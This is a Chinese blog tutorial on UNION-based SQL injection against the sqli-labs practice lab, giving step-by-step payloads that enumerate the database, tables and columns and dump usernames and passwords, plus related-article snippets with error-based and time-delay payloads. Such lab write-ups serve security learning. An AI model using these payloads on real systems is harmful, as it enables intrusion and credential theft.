sql注入之回显注入

最新推荐文章于 2024-05-02 11:12:29 发布
最新推荐文章于 2024-05-02 11:12:29 发布
阅读量3.9k 收藏 16
点赞数 3
分类专栏: kali linux渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maluxiao123/article/details/115066844
版权

SQL注入 回显注入 列数判断 联合查询 数据库信息获取
关键词由CSDN通过智能技术生成

之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。
回显注入需要依靠页面具有数据库查询出内容,使用注入来替换掉本身应该显示的内容来进行攻击的。比如在靶场sqli-labs的第二关中页面查询的内容是通过传入的id=2来控制的
在这里插入图片描述
当id=0时,数据库没有id=0的内容,所以就不返回任何数据
在这里插入图片描述

我们可以看他的后台查询语句
在这里插入图片描述
查询了users表中的所有内容,所以Angelina和L-kill-you是存储在数据库中的内容。以上是简单的分析。

1.接下来进行sql注入的第一步,进行注入点判断。
使用and 1=1和and1=2来判断
在这里插入图片描述
在这里插入图片描述
明显and语句执行了,导致整个sql语句为假,所以这里是一个数字型注入点,不需要进行闭合

2.第二步进行列数的判断,使用order by进行列数判断时,通常使用二分法来提高效率,比如100过大,就减半测试500。,结合页面判断列数不多,猜测4
在这里插入图片描述
4如果过大的话再猜测3,3回显正确
在这里插入图片描述
3.然后将id的值进行修改,修改为数据库中不存在的值,就会将回显的位置腾出来。
(1)联合查询进行回显位的判断
payload: id=0 union select 1,2,3 明显能看出2列和3列的位置有回显内容
在这里插入图片描述
(2)查库名
payload: id=0 union select 1,database(),3
在这里插入图片描述
(3)查表名
id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
其中库information_schema是mysql中自带的一个库,包含其他库的大量信息,通过它来查询其他库的信息,在mysql5.0以上都有
(4)查列名,表名为users
id=0 union slect 1,group_concat(column_name),3 from information_schema.columns where table_name=“users”
(5)查内容,字段名为id,username,password,我们不需要id的内容
id=0 union select 1,group_concat(username),group_concat(password) from security.users
在这里插入图片描述
在内容如果过多可以在语句中加上limit进行限制来逐个输出

thesky0001
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入-报错注入
课嗨教育的专栏
04-29 780
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 1.什么是报错注入 mysql_error 2.我们在什么情况下使用报错注入 在页面返连错错误信息的时候 3.函数 updatexml //5.1版本以上使用 extrachvalue floor //5.0版本之前也可以使用 请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格 返:1' LIMIT 0,1 htt...
sql注入-延时注入
课嗨教育的专栏
04-28 1424
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 延时注入和布尔盲注差不多 为什么要延时 因为有的时候我们知道这个地方存在注入但是页面返信息一样 加了个if延时条件判断 if(条件,是,否) http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201 返14秒 http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(
SQL注入)-DVWA
xy_sugar的博客
01-23 2625
概述 LOW等级 1、首先尝试正常操作,输入1 可是这里web应用通过查询数据库,获取了id为1的用户的信息,猜测SQL语句为: 2、接下来检测是否存在SQL注入漏洞,输入1’   报错,则说明单引号注入SQL语句中报错,存在SQL注入漏洞 尝试数字型,查询结果与id=1时的结果一样 尝试第二种情况,成功执行 尝试双引号,也没有成功 所以可知这里...
SQL注入--union判断
最新发布
YYYYU_ZHIZZZ的博客
05-02 360
sql注入(sqli-labs)
【网络安全---sql注入(1)】你知道什么是SQL注入吗?知道如何通过SQL注入来控制目标服务器吗?一篇文章教你sql注入漏洞的原理及方法
m0_67844671的博客
09-19 1073
SQL注入漏洞详解。包括原理,分类比如数字型,字符型,搜索型,xx型,宽字节注入,报错注入,盲注,有无等,各种注入payload以及产生原因等等
SQL注入--
qq_27339511的博客
04-10 356
注入练习:sqli-labs-Less-3和sqli-labs-Less-4。操作系统:@@version_compile_os。sqli-labs-Less-3闭合点为');sqli-labs-Less-3闭合点为");数据库名字:database()数据库版本:version()数据库用户:user()
SQL注入-可】报错注入:简介、相关函数、利用方法
05-29 1789
SQL注入-可
SQL注入
Libra_Ng
11-28 1202
SQL注入流程 SQL注入攻击步骤 注入流程 SQL注入分类 按前台数据情况分类: 注入: 盲注入: 注入攻击 注入测试环境:Apache+MySQL+PHP 单引号测试法 "恒真"测试法 "恒假"测试法 注入–寻找注入点 1.页面无变化 2.页面中少了部分内容 3.错误 4.跳转默认界面 5.直接关闭连接 注入–字段数 Order by命令 Union...
sql注入
qq_52108058的博客
11-03 855
经过对表中字段的查询发现,该admin表有三个字段,id、username、password。发现有一个admin用户,在通过limit 1,1查询第二用户为空,则只有一个用户。(可以理解为从数据库提取的数据被示在前端)可以在第二个字段处示我们想要的内容。发现的第二个字段处为。
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
基于错误SQL注入整理
12-14
 用我自己的话来讲,基于错误sql注入是通过sql语句的矛盾性来使数据被到页面上(当然在实际应用中得能在页面上,一般的网站都避免这种情况,哈哈,要是能碰上你偷着乐吧)。  0x01 用于错误...
易语言SQL注入
07-20
在网络安全领域,SQL注入是一种常见的攻击手段,通过输入恶意的SQL语句来获取、修改、删除数据库中的数据,甚至控制整个数据库系统。下面将详细介绍易语言SQL注入的相关知识点。 1. **SQL注入原理**: SQL注入主要...
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527.rar
04-10
2. **多模式测试**:工具可能支持多种SQL注入技术,如时间基注入、盲注、错误等,以适应不同类型的防护策略。 3. **数据提取**:一旦找到注入点,工具可能能从中提取数据库中的记录,如用户信息、管理员凭证或...
sql注入的思维导图。
04-19
SQL注入可以通过和盲注来获取数据库信息: * :通过查询结果来获取数据库信息。 * 盲注:通过延时或报错来判断数据库信息。 注入类型 SQL注入有多种类型,包括: * 数字型注入:不需要单引号闭合字符。 ...
web渗透小白----SQL注入
weixin_42128903的博客
04-23 607
在学习中快乐,在学习中进步,做个快乐小白。 环境:Apache+PHP+MySQL 目标:http://www.test.com/7999017.php?/id=22 ;SQL语句中红色字体为参数,注意体会引号的闭合 SQL注入以前台是否分为注入和盲注。现以SQL注入为例总结手工注入的思路和自已的理解(注:目标网站无防护)。 总体流程:查找注入点 ==> 查库名 ==> 查表名 ==> 查字段名 ==> 查重点数据 1.查找注入点: 方法一:在“http://
SQL注入-无】布尔盲注:原理、函数、利用过程
06-14 7132
SQL注入-无
sql注入的原理分析
qq_39416206的博客
03-16 2625
sql注入原理
SQL注入详解
热门推荐
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
sql注入如何判断
04-26
SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而可以执行未经授权的数据库操作。判断SQL注入位的方法主要有以下几种: 1. 错误消息:当注入SQL语句存在错误时,数据库可能会返相应的错误消息。攻击者可以通过观察错误消息来判断是否存在注入漏洞。 2. 布尔盲注:攻击者可以通过构造特定的SQL语句,利用数据库的布尔逻辑判断来判断位。例如,通过构造一个条件语句,根据返结果的真假来判断是否存在注入漏洞。 3. 时间盲注:类似于布尔盲注,但是攻击者通过构造特定的SQL语句,利用数据库的时间函数来判断位。例如,通过构造一个延时操作,根据返结果的延时时间来判断是否存在注入漏洞。 4. UNION注入:攻击者可以通过在注入点使用UNION语句,将恶意查询的结果合并到正常查询结果中。如果位发生了变化,说明注入成功。 5. 报错注入:攻击者可以通过在注入点使用SELECT、INSERT等语句,并故意构造错误来触发数据库报错。观察报错信息可以判断是否存在注入漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值